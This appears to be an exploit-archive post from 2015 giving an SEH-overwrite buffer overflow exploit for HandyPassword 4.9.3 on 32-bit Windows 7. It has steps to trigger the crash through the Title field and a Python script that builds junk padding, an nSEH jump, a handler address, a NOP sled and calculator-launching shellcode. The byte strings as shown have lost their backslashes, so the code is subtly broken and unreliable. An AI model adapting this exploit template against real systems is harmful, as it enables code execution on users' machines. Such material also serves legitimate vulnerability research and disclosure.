HandyPassword 4.9.3 SEH Overwrite
Posted on 24 October 2015
******************************************************************************************** # Exploit Title: HandyPassword SEH-Over Write Exploit # Date: 9/24/2015 # Exploit Author: Un_N0n # Software Link: http://www.handypassword.com/download.shtml # Version: 4.9.3 # Tested on: Windows 7 x86(32 BIT) ******************************************************************************************** [Steps to Produce the Crash]: 1- open 'HandyPassword.exe'. 2- Then From Menu Goto New Card->Simple Login Form. 3- Click on Create Card, Enter the contents of 'Exploit.txt' Created by script in the Title Field. 4- Enter Short Random value in the rest of the fields. 5- Click on OK ~ Calculator will appear and Software will Crash. [Code to produce Exploit]: ''' junk = "A"*1144 nseh = "xebx06x90x90" #JMP 6bytes jmp ="xB3x27x2Fx7F" #0x7f2f27b3 From nops = "x90"*50 shellcode = ("x31xdbx64x8bx7bx30x8bx7f" "x0cx8bx7fx1cx8bx47x08x8b" "x77x20x8bx3fx80x7ex0cx33" "x75xf2x89xc7x03x78x3cx8b" "x57x78x01xc2x8bx7ax20x01" "xc7x89xddx8bx34xafx01xc6" "x45x81x3ex43x72x65x61x75" "xf2x81x7ex08x6fx63x65x73" "x75xe9x8bx7ax24x01xc7x66" "x8bx2cx6fx8bx7ax1cx01xc7" "x8bx7cxafxfcx01xc7x89xd9" "xb1xffx53xe2xfdx68x63x61" "x6cx63x89xe2x52x52x53x53" "x53x53x53x53x52x53xffxd7"); junk2 = "D"*2000 file = open("exploit.txt",'w') file.write(junk+nseh+jmp+nops+shellcode+junk2) file.close()
